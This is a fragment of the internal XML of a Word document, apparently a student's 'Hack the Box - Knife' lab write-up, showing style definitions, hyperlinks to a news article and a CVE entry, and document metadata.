    <w:rsid w:val="00FE1D7F"/>
    <w:rsid w:val="00FE431B"/>
    <w:rsid w:val="00FE625A"/>
    <w:rsid w:val="00FF131B"/>
    <w:rsid w:val="00FF6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E94A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{336C7247-0462-491A-84B9-D7B89AA46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6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638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D638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D63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1A2CC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1A2CCA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164D12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147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147C4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D365D"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00051AD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EC605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A2163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1E08AC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9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numbering" Target="numbering.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/gadgets/2021/03/hackers-backdoor-php-source-code-after-breaching-internal-git-server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victim_ip:80" TargetMode="External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hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-280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4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36BB82-CE79-4A7D-A0CD-577CDCE36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9</TotalTime>
  <Pages>10</Pages>
  <Words>1434</Words>
  <Characters>8177</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>68</Lines>
  <Paragraphs>19</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Netbytes Security</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>9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ck the Box - Knife</dc:title>
  <dc:subject/>
  <dc:creator>John Howden</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>John Howden (Student)</cp:lastModifiedBy>
  <cp:revision>431</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-04T15:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-18T11:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>